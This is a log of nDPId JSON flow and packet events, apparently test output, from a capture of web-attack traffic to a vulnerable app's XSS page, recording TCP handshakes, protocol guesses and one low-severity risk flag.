-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3176,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347348776,"flow_last_seen":1499347348776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347348776,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3176,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1499347348776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347348776,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P2lAAD4GhmesEAABwKgKMtuwAFBd3mN8AAAAAKACchBkWQAAAgQFtAQCCAoBOlwVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":2,"flow_last_seen":1499347348776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347348776,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ27AjVjRJXd5jfaAScSDcKQAAAgQFtAQCCAoD5C2LATpcFQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":1499347348777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347348777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P2pAAD4Ghm6sEAABwKgKMtuwAFBd3mN9I1Y0SoAQAOV7MAAAAQEICgE6XBYD5C2L"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347351299,"flow_last_seen":1499347351299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347351299,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1499347351299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347351299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XeBAAD4GZ\/CsEAABwKgKMtvKAFA3cANsAAAAAKACchDoRgAAAgQFtAQCCAoBOl6MAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1499347351299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347351299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ28rLt8HDN3ADbaAScSAnxAAAAgQFtAQCCAoD5DACATpejAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1499347351300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347351300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XeFAAD4GZ\/esEAABwKgKMtvKAFA3cANty7fBxIAQAOXGywAAAQEICgE6XowD5DAC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347352698,"flow_last_seen":1499347352698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347352698,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1499347352698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347352698,"pkt":"ABm5CmnxAMGxFOsxCABFAAA894dAAD4GzkisEAABwKgKMtvYAFB9d6htAAAAAKACchD70QAAAgQFtAQCCAoBOl\/qAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1499347352699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347352699,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ29gsQT\/ffXeobqAScSBbTAAAAgQFtAQCCAoD5DFgATpf6gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1499347352699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347352699,"pkt":"ABm5CmnxAMGxFOsxCABFAAA094hAAD4Gzk+sEAABwKgKMtvYAFB9d6huLEE\/4IAQAOX6UwAAAQEICgE6X+oD5DFg"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347355229,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347355229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GHxAAD4GrVSsEAABwKgKMtvyAFB7gnofAAAAAKACchApggAAAgQFtAQCCAoBOmJjAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2\/L7jmGSe4J6IKAScSCVgwAAAgQFtAQCCAoD5DPYATpiYwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1499347355230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347355230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GH1AAD4GrVusEAABwKgKMtvyAFB7gnog+45hk4AQAOU0iwAAAQEICgE6YmMD5DPY"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347356478,"flow_last_seen":1499347356478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347356478,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1499347356478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347356478,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hsZAAD4GPwqsEAABwKgKMtwAAFAJPOVdAAAAAKACchAvRAAAAgQFtAQCCAoBOmObAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3233,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1499347356478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347356478,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3AC\/\/WVQCTzlXqAScSDR3wAAAgQFtAQCCAoD5DURATpjmwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1499347356478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347356478,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hsdAAD4GPxGsEAABwKgKMtwAAFAJPOVev\/1lUYAQAOVw5wAAAQEICgE6Y5sD5DUR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347357727,"flow_last_seen":1499347357727,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347357727,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1499347357727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p9BAAD4GHgCsEAABwKgKMtwOAFCyy8MDAAAAAKACchCmyAAAAgQFtAQCCAoBOmTTAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1499347357727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3A4qYd\/GssvDBKAScSBjUgAAAgQFtAQCCAoD5DZJATpk0wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1499347357728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347357728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p9FAAD4GHgesEAABwKgKMtwOAFCyy8MEKmHfx4AQAOUCWgAAAQEICgE6ZNMD5DZJ"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347360285,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347360285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h\/1AAD4GPdOsEAABwKgKMtwoAFB3hOCvAAAAAKACchDBygAAAgQFtAQCCAoBOmdSAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ci3TdMGd4TgsKAScSD7qAAAAgQFtAQCCAoD5DjIATpnUgEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1499347360286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347360286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0h\/5AAD4GPdqsEAABwKgKMtwoAFB3hOCwt03TB4AQAOWarwAAAQEICgE6Z1MD5DjI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347361540,"flow_last_seen":1499347361540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347361540,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1499347361540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347361540,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8izFAAD4GOp+sEAABwKgKMtw2AFCL9eO9AAAAAKACchCpAwAAAgQFtAQCCAoBOmiMAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1499347361540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347361540,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Db87gPNi\/XjvqAScSBrQAAAAgQFtAQCCAoD5DoCATpojAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1499347361541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347361541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0izJAAD4GOqasEAABwKgKMtw2AFCL9eO+\/O4DzoAQAOUKRwAAAQEICgE6aI0D5DoC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347364056,"flow_last_seen":1499347364056,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364056,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
